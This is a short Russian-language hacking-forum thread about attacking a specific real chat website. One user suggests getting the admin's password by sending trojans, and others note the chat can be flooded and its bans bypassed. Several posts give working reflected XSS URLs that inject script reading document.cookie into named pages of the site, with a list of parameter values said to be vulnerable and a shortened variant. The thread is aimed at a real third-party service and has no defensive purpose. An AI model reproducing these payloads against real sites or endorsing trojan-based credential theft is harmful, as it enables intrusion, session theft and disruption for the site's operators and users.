![]() |
http://chatinet.zp.ua/
http://chatinet.zp.ua/ кто нибудь знает чтото о нем???
|
нет там нечего =)
и драствуй земляк =) |
Попробуй добыть пароль у админа, кинь пару троянчиков)
|
Флуд без проблем :)
банан обходится легко. |
Мне этот чат знаком до боли...
Уже незнаю скок раз пытался там баги найти!!! Не нашол нчего, все че получалось это ток флуд)) че могу сказать, чат действительно клево сделан (я имею ввиду безопасность) ну есле кто чего найдет, поделитесь будет очень интересно! Цитата:
|
Цитата:
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cook ie)</script> |
upd
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script> Заменяем 001, на: 002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016. Везде там xss:) |
Плохой из тебя хакер )
http://chatinet.zp.ua/winter2005/party/?"><script>alert(document.cookie)</script> так тоже можно и короче.. а вообще хсс не должен выдовать данные которыми могут воспользоваться в злосных целях.. |
а понту с этих Xss они не в профиле, там куки не передаються
|
| Время: 00:54 |